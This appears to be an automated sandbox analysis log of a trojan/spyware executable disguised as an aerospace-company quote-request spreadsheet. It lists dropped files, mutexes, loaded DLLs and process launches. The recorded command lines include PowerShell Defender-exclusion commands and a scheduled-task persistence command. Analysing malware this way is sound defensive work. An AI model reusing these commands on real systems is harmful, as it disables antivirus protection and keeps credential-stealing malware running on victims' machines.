Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, XSC45GRfM1SSKcDUtG.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, kkyuEWbsq1ZCQwxdXQ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, kkyuEWbsq1ZCQwxdXQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/14@3/3

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

File created: C:\Users\user\AppData\Roaming\WheTgQY.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Mutant created: \Sessions\1\BaseNamedObjects\gZshqEzwcLn
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

File created: C:\Users\user\AppData\Local\Temp\tmp957E.tmp

Jump to behavior

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002D09000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	ReversingLabs: Detection: 35%
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

File read: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe C:\Users\user\AppData\Roaming\WheTgQY.exe
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe"	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process created: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Process created: C:\Users\user\AppData\Roaming\WheTgQY.exe "C:\Users\user\AppData\Roaming\WheTgQY.exe"	Jump to behavior

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
